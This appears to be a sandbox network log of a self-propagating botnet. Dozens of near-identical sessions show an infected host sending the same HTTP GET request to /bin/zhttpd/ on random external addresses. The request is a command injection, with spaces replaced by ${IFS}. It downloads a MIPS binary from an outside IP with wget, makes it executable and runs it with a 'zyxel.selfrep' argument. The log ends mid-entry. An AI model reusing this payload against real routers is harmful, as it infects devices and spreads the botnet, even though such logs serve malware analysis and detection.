                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:11.970289946 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4904192.168.2.145174084.63.159.235443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:11.970330954 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4905192.168.2.1446150111.166.148.12443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:11.970376968 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4906192.168.2.1440646135.44.77.16443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:11.970401049 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4907192.168.2.1447428211.181.95.103443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:11.970460892 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4908192.168.2.1457558171.91.133.125443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:11.970496893 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4909192.168.2.1459608130.60.140.167443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:11.970556021 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4910192.168.2.145954876.26.113.1443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:11.970592022 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4911192.168.2.144160876.84.209.241443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:11.970632076 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4912192.168.2.1456374165.251.233.104443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:11.970675945 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4913192.168.2.1447408179.112.33.46443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:11.970724106 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4914192.168.2.145853487.219.39.82443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:11.970758915 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4915192.168.2.1432940177.212.87.224443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:11.970803022 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4916192.168.2.1440490109.52.208.34443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:11.970848083 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4917192.168.2.1446916209.233.60.228443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:11.970877886 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4918192.168.2.145555059.2.64.69443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:11.970918894 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4919192.168.2.1437308106.100.92.69443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:11.970943928 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4920192.168.2.145786480.254.203.198443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:11.971004963 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4921192.168.2.1453172116.3.115.63443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:11.971041918 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4922192.168.2.145188468.166.39.206443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:11.971067905 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4923192.168.2.145818631.26.9.222443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:11.971126080 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4924192.168.2.1440574156.82.189.223443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:11.971199989 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4925192.168.2.144030261.188.192.31443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:11.971245050 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4926192.168.2.145960635.86.233.102443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:11.971276999 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4927192.168.2.1460874196.24.75.241443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:11.971302986 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4928192.168.2.145255618.8.226.46443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:11.971332073 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4929192.168.2.144464854.143.7.31443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:11.971363068 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4930192.168.2.1440536192.145.223.232443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:11.971415997 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4931192.168.2.1435960160.123.249.146443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:11.971467018 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4932192.168.2.144393858.181.25.175443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:11.971498966 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4933192.168.2.1432820133.95.130.42443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:11.971534014 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4934192.168.2.143830088.223.224.252443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:11.971565962 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4935192.168.2.1440504171.106.118.81443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:11.971606016 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4936192.168.2.1449288122.113.53.165443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:11.971638918 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4937192.168.2.1443592118.34.137.207443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:11.971688032 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4938192.168.2.145377496.40.29.106443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:11.971712112 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4939192.168.2.1439576105.217.244.224443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:11.971745014 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4940192.168.2.144930671.19.31.236443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:11.971791029 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4941192.168.2.1441816193.53.88.103443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:11.971827984 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4942192.168.2.144835270.34.245.132443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:11.971879005 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4943192.168.2.1438536194.147.152.37443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:11.971901894 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4944192.168.2.1458672136.110.200.95443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:11.971951008 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4945192.168.2.14503745.162.244.250443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:11.971999884 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4946192.168.2.1434210116.192.170.228443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:11.972021103 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4947192.168.2.1458624141.89.44.111443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:11.972073078 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4948192.168.2.143458268.68.216.100443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:11.972125053 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4949192.168.2.1455874145.208.164.238443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:11.972140074 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4950192.168.2.143355074.181.213.55443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:11.972182035 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4951192.168.2.14365944.217.34.162443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:11.972218990 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4952192.168.2.1442200148.178.72.156443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:11.972263098 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4953192.168.2.1443828116.90.140.166443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:11.972296000 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4954192.168.2.14598589.84.167.149443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:11.972335100 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4955192.168.2.143287886.187.191.89443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:11.972374916 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4956192.168.2.14476948.234.109.253443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:11.972408056 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4957192.168.2.145800890.216.92.235443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:11.972450972 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4958192.168.2.1446248164.55.124.10443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:11.972496986 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4959192.168.2.144267882.72.87.18443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:11.972538948 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4960192.168.2.1456520187.105.136.76443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:11.972577095 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4961192.168.2.143644895.168.83.10443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:11.972605944 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4962192.168.2.1434212222.144.227.115443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:11.972647905 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4963192.168.2.14497665.249.15.138443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:11.972687960 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4964192.168.2.144213052.167.100.124443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:11.972737074 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4965192.168.2.144800479.246.100.228443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:11.972762108 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4966192.168.2.143465251.14.219.164443
                                                        TimestampBytes transferredDirectionData
